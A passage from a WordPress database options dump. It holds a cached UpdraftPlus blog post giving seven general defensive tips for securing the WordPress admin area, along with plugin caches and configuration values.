+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:12:{i:0;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:6:\"Backup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:4:\"hack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:6:\"How to\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:7:\"protect\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:10:\"protecting\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:8:\"security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:8;a:5:{s:4:\"data\";s:6:\"update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:9;a:5:{s:4:\"data\";s:11:\"UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:10;a:5:{s:4:\"data\";s:7:\"website\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:11;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1144209\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:777:\"<p>Content management system platforms like WordPress have successfully democratized website building in the current digital era, with what used to be a potentially expensive and tedious and difficult process, now becoming easier and more accessible for both inexperienced and experienced &#8230; <a href=\"https://updraftplus.com/protecting-wordpress-admin-area/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/protecting-wordpress-admin-area/\">7 critical measures for protecting your WordPress admin area</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"John Allen\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:16390:\"<p><span style=\"font-weight: 400;\">Content management system platforms like WordPress have successfully democratized website building in the current digital era, with what used to be a potentially expensive and tedious and difficult process, now becoming easier and more accessible for both inexperienced and experienced site owners. But how do you go about protecting your WordPress admin area?</span></p>\n<p><span style=\"font-weight: 400;\">However, the issues of security have remained challenging for many WordPress site owners. According to a report by WordPress security plugin</span><a href=\"https://wpmanageninja.com/wordpress-security-statistics/#:~:text=According%20to%20WordFence%2C%20there%20are,11%25%20are%20from%20WordPress%20Themes\"> <span style=\"font-weight: 400;\">WordFence</span></a><span style=\"font-weight: 400;\">, almost 90,000 security issues were reported every 60 seconds on WordPress websites in 2020.</span></p>\n<p><span style=\"font-weight: 400;\">This data is even more troubling when we take into account login-based WordPress sites like eCommerce platforms, where sensitive information such as banking and debit card details are shared daily.</span></p>\n<p><span style=\"font-weight: 400;\">If you’re trying to</span><a href=\"https://www.bigcommerce.com/blog/build-an-ecommerce-website/\"> <span style=\"font-weight: 400;\">build a website</span></a><span style=\"font-weight: 400;\">, using WordPress is a great idea, but you may be worried about the security of your WordPress admin area, especially given the sheer volume of cyber threats in the previous year. </span></p>\n<p><span style=\"font-weight: 400;\">If you wish to reinforce your log-in mechanics, consider these seven simple measures to secure your admin area.</span></p>\n<h2><span style=\"font-weight: 400;\">1. Change your passwords often</span></h2>\n<p><span style=\"font-weight: 400;\">Let’s start with the basics of WordPress admin and login security. It may seem like the simplest solution when it comes to your site’s security, but changing passwords is often overlooked as an effective security measure.</span></p>\n<p><span style=\"font-weight: 400;\">This cybersecurity approach is essential to any login-based online service and should be implemented across all types of sites, from streaming platforms like Netflix, to social media sites like Instagram, to </span><a href=\"https://www.ringcentral.com/group-meeting-apps.html\"><span style=\"font-weight: 400;\">online group meeting</span></a><span style=\"font-weight: 400;\"> apps like RingCentral. When it comes to preventing admin-related issues, changing a password regularly is a popular cybersecurity tactic. </span></p>\n<h2><span style=\"font-weight: 400;\">2. Keep your plugins updated</span></h2>\n<p><span style=\"font-weight: 400;\">Let’s go back to that WordFence data we mentioned earlier. In one</span><a href=\"https://wpmanageninja.com/wordpress-security-statistics/#:~:text=According%20to%20WordFence%2C%20there%20are,11%25%20are%20from%20WordPress%20Themes\"> <span style=\"font-weight: 400;\">study</span></a><span style=\"font-weight: 400;\"> conducted by WordFence researchers, it was found that over half of WordPress cybersecurity issues (52%) were caused by plugins. </span></p>\n<p><span style=\"font-weight: 400;\">As such, he first step toward securing your WordPress site is investing in WordPress security plugins. Many of these track and record login attempts to analyze any possible admin area threats.</span></p>\n<p><span style=\"font-weight: 400;\">Additionally, it’s important to</span><a href=\"https://updraftplus.com/why-defunct-wordpress-plugins-pose-a-threat-how-to-secure-your-site/\"> <span style=\"font-weight: 400;\">get rid of outdated WordPress plugins</span></a><span style=\"font-weight: 400;\">. These pose a threat to your site’s security since they stop updating, meaning their security measures end up being lacking. The safest course of action is to uninstall them, as disabling doesn’t get rid of the additional (and weak) code. Use </span><a href=\"https://updraftplus.com/updraftcentral/\"><span style=\"font-weight: 400;\">UpdraftCentral</span></a><span style=\"font-weight: 400;\"> to efficiently manage, update and backup multiple website plugins, themes and backups from one place for sites on which UpdraftPlus is installed.</span></p>\n<h2><span style=\"font-weight: 400;\">3. Implement SSL login pages</span></h2>\n<p><span style=\"font-weight: 400;\">SSL stands for “</span><a href=\"https://updraftplus.com/how-to-increase-security-while-developing-a-wordpress-site/\"><span style=\"font-weight: 400;\">secure sockets layer</span></a><span style=\"font-weight: 400;\">”. This security protocol is generally used on websites that store sensitive data, especially those that require authentication to log in. In essence, SSL measures activate a digital lock &#8211; technically, an HTTPS protocol &#8211; that guarantees a secure connection from the server to the browser.</span></p>\n<p><span style=\"font-weight: 400;\">Usually your run-of-the-mill hosting provider will include these measures in your subscription. If they do not, consider purchasing an SSL certificate and installing it on your WordPress server. </span></p>\n<p><span style=\"font-weight: 400;\">This is especially useful for eCommerce WordPress sites, which ask their clients to log in with a profile to automate the checkout process when paying via credit or debit card.</span></p>\n<h2><span style=\"font-weight: 400;\">4. Limit login attempts</span></h2>\n<p><span style=\"font-weight: 400;\">Restricting the number of possible login attempts is one reliable</span><a href=\"https://www.cleverfiles.com/howto/cybersecurity-tips-to-protect-data.html\"> <span style=\"font-weight: 400;\">cybersecurity tip to protect data</span></a><span style=\"font-weight: 400;\">, especially if you’re looking to prevent potential brute force attacks. </span></p>\n<p><span style=\"font-weight: 400;\">These cybersecurity breaches are achieved by bombarding an admin platform with every conceivable combination of characters to form passwords, using a simple but effective cracking method of trial and error. </span></p>\n<p><span style=\"font-weight: 400;\">By limiting login attempts, you can protect your users and your page from attacks of this nature.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1144217 size-full\" src=\"https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0.png\" alt=\"Limit login attempts WordPress security image\" width=\"1051\" height=\"701\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0.png 1051w, https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0-980x654.png 980w, https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0-480x320.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1051px, 100vw\" /></a></p>\n<p><a href=\"https://unsplash.com/photos/6pflEeSzGUo\"><span style=\"font-weight: 400;\">Image Source</span></a></p>\n<p><span style=\"font-weight: 400;\">However, when it comes to WordPress admin security issues, it’s important to note that not every hazardous log-in attempt comes from criminals looking to steal data. Sometimes, admin platforms are subjected to non-malicious intrusions performed by users.  </span></p>\n<p><span style=\"font-weight: 400;\">If you’re running a WordPress site that provides user registration, there’s a chance that your users – or yourself – will get locked out of their account by accident. Forgetting your password has happened to everyone at some point after all.</span></p>\n<p><span style=\"font-weight: 400;\">The best way to separate malware attacks and non-malicious intrusions is to implement a network intrusion detection system that can track, record, and analyze potential login or admin issues, without interfering with the traffic it monitors. This way, you can ensure you’re not punishing forgetful users, but are keeping them protected nonetheless.</span></p>\n<h2><span style=\"font-weight: 400;\">5. Use two-factor authentication</span></h2>\n<p><span style=\"font-weight: 400;\">Two-factor authentication is a security protocol that enforces an additional check on users looking to gain access to WordPress sites. This protection method adds an extra layer of security to passwords by asking for a unique one-use-only code that’s sent to your smartphone.</span></p>\n<p><span style=\"font-weight: 400;\">These apps and plugins are installed on your smart device and will send the codes so you can access your WordPress login screen. This approach is seen as a more secure way of changing your passwords regularly and is particularly recommended for eCommerce sites.</span></p>\n<h2><span style=\"font-weight: 400;\">6. Implement IAM solutions</span></h2>\n<p><span style=\"font-weight: 400;\">Identity and access management (IAM) software solutions are used to limit the number of remote users accessing online platforms via admin areas and login accounts. In the digital era, the IAM market has grown rapidly and the current list of</span><a href=\"https://www.esecurityplanet.com/products/best-iam-software/\"> <span style=\"font-weight: 400;\">IAM solutions</span></a><span style=\"font-weight: 400;\"> available can overwhelm newcomers and inexperienced WordPress site owners alike.</span></p>\n<p><span style=\"font-weight: 400;\">There’s a basic list of points to follow to make the most of your IAM service, regardless of which IAM option you choose. Here’s a shortlist of what to do before you commit to a particular provider:</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Access the IT architecture.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Look for any possible incompatibilities between the OS, third-party application or plugins, and the IAM tool.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Verify that your IAM system is compliant with guidelines and laws in your industry, market, and country.</span></li>\n</ul>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0-1.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1144218 size-full\" src=\"https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0-1.png\" alt=\"Security WordPress image\" width=\"960\" height=\"640\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0-1.png 960w, https://updraftplus.com/wp-content/uploads/2021/06/pasted-image-0-1-480x320.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 960px, 100vw\" /></a></p>\n<p><a href=\"https://pixabay.com/es/photos/seguridad-protecci%C3%B3n-antivirus-265130/\"><span style=\"font-weight: 400;\">Image Source</span></a></p>\n<h2><span style=\"font-weight: 400;\">7. Have a backup</span></h2>\n<p><span style=\"font-weight: 400;\">The sad truth is, some things are unavoidable. It may be difficult to read, but there’s a chance that even if you do everything right, hackers will still be able to gain access to and attack your admin area. If that happens, it’s important to have a plan of action ready.</span></p>\n<p><span style=\"font-weight: 400;\">Imagine the worst-case scenario: your site has been attacked and hacked. There are no more prevention measures to implement. </span></p>\n<p><span style=\"font-weight: 400;\">First things first, remember not to panic. Work to identify the problem and react accordingly. The best way to know if you’ve fallen victim to a cybersecurity breach is to look for possible signs of a hacking attack: </span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">You’re unable to log in.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Your site is redirecting elsewhere.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Your content has disappeared or there is new strange content and links.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Your site is running slower than usual.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Once you’ve identified the problem, the fastest way to fix any possible issues is to</span><a href=\"https://updraftplus.com/how-restoring-a-wordpress-website-can-be-more-difficult-than-you-think/\"> <span style=\"font-weight: 400;\">restore your WordPress website</span></a><span style=\"font-weight: 400;\"> using UpdraftPlus. This will allow you to undo any hazardous changes and get back to normal as quickly as possible. To do so, you must have an older version of your site as a backup somewhere secure &#8211; such as a cloud storage platform.</span></p>\n<p><span style=\"font-weight: 400;\">As you may be aware, having your data backed up is one of the most essential things to do in terms of cybersecurity. If you want to keep a record of past versions of your site separate from your site,</span><a href=\"https://updraftplus.com/shop/\"><span style=\"font-weight: 400;\"> cloud-storage solutions</span></a><span style=\"font-weight: 400;\"> offer safe and secure backups that can help you relaunch your site in just minutes after an attack.</span></p>\n<h2><span style=\"font-weight: 400;\">Summary</span></h2>\n<p><span style=\"font-weight: 400;\">Now you have read seven effective security tips for your WordPress admin area, let’s reiterate what we’ve learned so far:</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Change your passwords often.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Install login security plugins (and uninstall old or obsolete plugins).</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Implement SSL encryption-based protocols.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Combat brute force attacks by limiting login attempts.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Use additional one-use-only passwords and codes by adding 2FA.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Limit your log-in possibilities with IAM software solutions.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Have a contingency plan to fight security breaches, malware, and ransomware viruses.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Keep a backup version of your site and use it during cybersecurity emergencies.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">If you follow these measures, your WordPress site should be protected from any attacks and ready to combat and react to any issues, should the worst happen. </span></p>\n<p><span style=\"font-weight: 400;\">What are you waiting for? Go out there and turn your WordPress page into an online fortress using </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\"> and </span><a href=\"https://updraftplus.com/updraftcentral/\"><span style=\"font-weight: 400;\">UpdraftCentral</span></a><span style=\"font-weight: 400;\"> today!</span></p>\n<p><a href=\"https://www.linkedin.com/in/johnlallen/\">John Allen</a><span style=\"font-weight: 400;\"> has written for websites such as </span><a href=\"https://slack-redir.net/link?url=https%3A%2F%2Fblog.hubspot.com%2Fservice%2Fsms-customer-support\"><span style=\"font-weight: 400;\">Hubspot</span></a><span style=\"font-weight: 400;\"> and </span><a href=\"https://slack-redir.net/link?url=https%3A%2F%2Fcollaboration.toolbox.com%2Fguest-article%2Fwhy-sdn-unified-communications-is-a-perfect-match-for-workplace-digitalization\"><span style=\"font-weight: 400;\">Toolbox</span></a><span style=\"font-weight: 400;\">.</span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/protecting-wordpress-admin-area/\">7 critical measures for protecting your WordPress admin area</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://updraftplus.com/protecting-wordpress-admin-area/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:2:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";s:4:\"href\";s:39:\"http://feeds.feedburner.com/UpdraftPlus\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:3:\"rel\";s:3:\"hub\";s:4:\"href\";s:32:\"http://pubsubhubbub.appspot.com/\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:4:\"info\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:3:\"uri\";s:11:\"updraftplus\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:11:{s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"etag\";s:27:\"Ppz1tuhrbpZWRjLot7PuDX30fxU\";s:13:\"last-modified\";s:29:\"Wed, 22 Sep 2021 10:15:12 GMT\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"date\";s:29:\"Wed, 22 Sep 2021 12:02:07 GMT\";s:7:\"expires\";s:29:\"Wed, 22 Sep 2021 12:02:07 GMT\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:22:\"x-content-type-options\";s:7:\"nosniff\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:6:\"server\";s:3:\"GSE\";s:7:\"alt-svc\";s:189:\"h3=\":443\"; ma=2592000,h3-29=\":443\"; ma=2592000,h3-T051=\":443\"; ma=2592000,h3-Q050=\":443\"; ma=2592000,h3-Q046=\":443\"; ma=2592000,h3-Q043=\":443\"; ma=2592000,quic=\":443\"; ma=2592000; v=\"46,43\"\";}}s:5:\"build\";s:14:\"20210126075719\";}','no'),(510249,'_transient_timeout_feed_mod_e0061ca2fa5b884e483872aa34d3e7eb','1632355327','no'),(510250,'_transient_feed_mod_e0061ca2fa5b884e483872aa34d3e7eb','1632312127','no'),(510251,'_transient_timeout_updraftplus_dashboard_news','1632355327','no'),(510252,'_transient_updraftplus_dashboard_news','<div class=\"rss-widget\"><ul><li class=\"updraftplus_dashboard_news_item\"><a href=\"https://zphiblgz.org/wp-admin/\" class=\"dashicons dashicons-no-alt\" title=\"Dismiss all UpdraftPlus news\" onClick=\"updraftplus_dismiss_dashboard_news(); return false;\" style=\"float: right; box-shadow: none; margin-left: 5px;\"></a><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/UpdraftPlus/~3/IYqI44wz3a8/\'>UpdraftPlus: How to protect customer data and prevent GDPR breaches on your WordPress site</a></li><li class=\"updraftplus_dashboard_news_item\"><a href=\"https://zphiblgz.org/wp-admin/\" class=\"dashicons dashicons-no-alt\" title=\"Dismiss all UpdraftPlus news\" onClick=\"updraftplus_dismiss_dashboard_news(); return false;\" style=\"float: right; box-shadow: none; margin-left: 5px;\"></a><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/UpdraftPlus/~3/WXNMF6A23Lg/\'>UpdraftPlus: Speed up your WordPress site using image optimization</a></li></ul></div>','no'),(510253,'_transient_timeout_dash_v2_88ae138922fe95674369b1cb3d215a2b','1632355327','no'),(510254,'_transient_dash_v2_88ae138922fe95674369b1cb3d215a2b','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2021/09/episode-16-a-sneak-peek-at-wordpress-5-9/\'>WP Briefing: Episode 16: A Sneak Peek at WordPress 5.9</a></li><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2021/09/join-us-for-wordpress-translation-day-global-events-in-september-2021/\'>Join us for WordPress Translation Day Global Events in September 2021</a></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wptavern.com/godaddy-pro-to-host-second-expand-2021-event-on-september-24-in-india?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=godaddy-pro-to-host-second-expand-2021-event-on-september-24-in-india\'>WPTavern: GoDaddy Pro To Host Second EXPAND 2021 Event on September 24 in India</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/open-collective-launches-new-way-to-support-open-source-through-public-stock-shares?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=open-collective-launches-new-way-to-support-open-source-through-public-stock-shares\'>WPTavern: Open Collective Launches New Way to Support Open Source through Public Stock Shares</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/stellarwp-acquires-learning-management-system-learndash?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=stellarwp-acquires-learning-management-system-learndash\'>WPTavern: StellarWP Acquires Learning Management System LearnDash</a></li></ul></div>','no'),(511216,'_transient_timeout_GFCache_85e62ef8c6120bae64e9182a9a98cc7c','1632335555','no'),(511217,'_transient_GFCache_85e62ef8c6120bae64e9182a9a98cc7c','a:7:{i:0;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"1\";s:10:\"lead_count\";s:2:\"67\";}i:1;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"2\";s:10:\"lead_count\";s:2:\"69\";}i:2;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"4\";s:10:\"lead_count\";s:1:\"1\";}i:3;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"6\";s:10:\"lead_count\";s:2:\"93\";}i:4;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"7\";s:10:\"lead_count\";s:2:\"11\";}i:5;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"8\";s:10:\"lead_count\";s:3:\"125\";}i:6;O:8:\"stdClass\":2:{s:7:\"form_id\";s:2:\"10\";s:10:\"lead_count\";s:3:\"108\";}}','no'),(511218,'_transient_timeout_GFCache_b4f86e11e35834c437bcd47154f3f638','1632335555','no'),(511219,'_transient_GFCache_b4f86e11e35834c437bcd47154f3f638','a:6:{i:0;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"1\";s:10:\"view_count\";s:5:\"13946\";}i:1;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"2\";s:10:\"view_count\";s:3:\"506\";}i:2;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"6\";s:10:\"view_count\";s:4:\"5706\";}i:3;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"7\";s:10:\"view_count\";s:4:\"4332\";}i:4;O:8:\"stdClass\":2:{s:7:\"form_id\";s:1:\"8\";s:10:\"view_count\";s:4:\"1844\";}i:5;O:8:\"stdClass\":2:{s:7:\"form_id\";s:2:\"10\";s:10:\"view_count\";s:4:\"5336\";}}','no'),(510293,'_transient_timeout_GOTMLS_upgrade_notice_4.19.69_4.20.72','1632401989','no'),(510294,'_transient_GOTMLS_upgrade_notice_4.19.69_4.20.72','<div class=\"GOTMLS_upgrade_notice\"><li><b>4.20.72:</b> Updated registration form, fixed session check, and removed older code from WordPress Repository.\n\n</li><li><b>4.20.59:</b> Various minor bug fixes, added Core Files Definitions for ClassicPress, and tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.</li></div>','no'),(510315,'hustle_version','4.4.5','yes'),(510328,'_site_transient_timeout_shield_mod_config_plugin','1632920474','no'),(510329,'_site_transient_shield_mod_config_plugin','a:6:{s:10:\"properties\";a:16:{s:4:\"slug\";s:6:\"plugin\";s:4:\"name\";s:16:\"General Settings\";s:12:\"sidebar_name\";s:7:\"General\";s:10:\"menu_title\";s:13:\"Configuration\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:6:\"plugin\";s:7:\"tagline\";s:23:\"General Plugin Settings\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:10;}s:13:\"admin_notices\";a:9:{s:14:\"plugin-too-old\";a:6:{s:2:\"id\";s:14:\"plugin-too-old\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:1;s:4:\"type\";s:5:\"error\";}s:17:\"override-forceoff\";a:6:{s:2:\"id\";s:17:\"override-forceoff\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:15:\"plugin-disabled\";a:6:{s:2:\"id\";s:15:\"plugin-disabled\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:16:\"update-available\";a:6:{s:2:\"id\";s:16:\"update-available\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:17:\"compat-sgoptimize\";a:7:{s:2:\"id\";s:17:\"compat-sgoptimize\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:12:\"plugin_admin\";s:6:\"ignore\";s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:7:\"warning\";}s:14:\"wizard_welcome\";a:3:{s:2:\"id\";s:14:\"wizard_welcome\";s:8:\"per_user\";b:0;s:4:\"type\";s:4:\"info\";}s:26:\"plugin-mailing-list-signup\";a:4:{s:2:\"id\";s:26:\"plugin-mailing-list-signup\";s:16:\"min_install_days\";i:5;s:4:\"type\";s:5:\"promo\";s:12:\"drip_form_id\";s:9:\"250437573\";}s:14:\"allow-tracking\";a:4:{s:2:\"id\";s:14:\"allow-tracking\";s:12:\"plugin_admin\";b:1;s:16:\"min_install_days\";i:3;s:4:\"type\";s:5:\"promo\";}s:11:\"rate-plugin\";a:3:{s:2:\"id\";s:11:\"rate-plugin\";s:16:\"min_install_days\";i:30;s:4:\"type\";s:5:\"promo\";}}s:8:\"sections\";a:7:{i:0;a:5:{s:4:\"slug\";s:16:\"section_defaults\";s:7:\"primary\";b:1;s:5:\"title\";s:15:\"Plugin Defaults\";s:11:\"title_short\";s:15:\"Plugin Defaults\";s:9:\"beacon_id\";i:389;}i:1;a:3:{s:4:\"slug\";s:30:\"section_general_plugin_options\";s:5:\"title\";s:22:\"General Plugin Options\";s:11:\"title_short\";s:15:\"General 